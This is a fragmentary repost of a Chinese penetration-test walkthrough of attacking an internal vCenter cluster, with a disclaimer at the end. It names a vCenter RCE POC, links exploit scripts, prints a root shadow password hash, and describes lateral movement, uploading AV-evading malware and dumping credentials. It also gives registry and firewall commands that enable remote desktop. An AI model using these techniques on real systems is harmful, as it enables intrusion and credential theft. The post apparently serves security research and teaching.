文章来源:https://forum.butian.net/share/4091
最近在做项目的时候,测到了一个部署在内网的存在漏洞的vCenter集群,这不巧了,正好最近在研究这vCenter、域这些集控类设备的打法,于是做了详细记录,有很多碰到的问题和解决办法,大佬勿喷哈哈。
[//内网IP poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 ]https:
https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py
root:$6$QL15TDCu$8HetMyfCTNW6LDS5XKb0yvY7SZqxa55PExH9SKb1pjnzSr/4yVBkOQLAghKwWah3NuqxWIaSFJZ//:0:0:365:7:::
vCenter SSO:
1. 用户访问vCenter
2. vCenter生成SAML Request,通过浏览器携带参数重定向到Idp地址
3. 用户在Idp地址完成认证
4. Idp生成SAML Response(包含身份断言,签名),通过自动门提交表单将其发送
给vCenter
5. vCenter 对 SAML Response 的内容进行检验,通过后返回session cookie
6. 用户成功登录
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py
该主机是一台文件存储服务器,利用横向移动工具Impacket wmiexec+net use上传免杀木马并执行,上线后抓取hash及明文密码
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
原文始发于微信公众号(李白你好):实战|内网中vCenter集群攻击全程实录,学会你也行!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论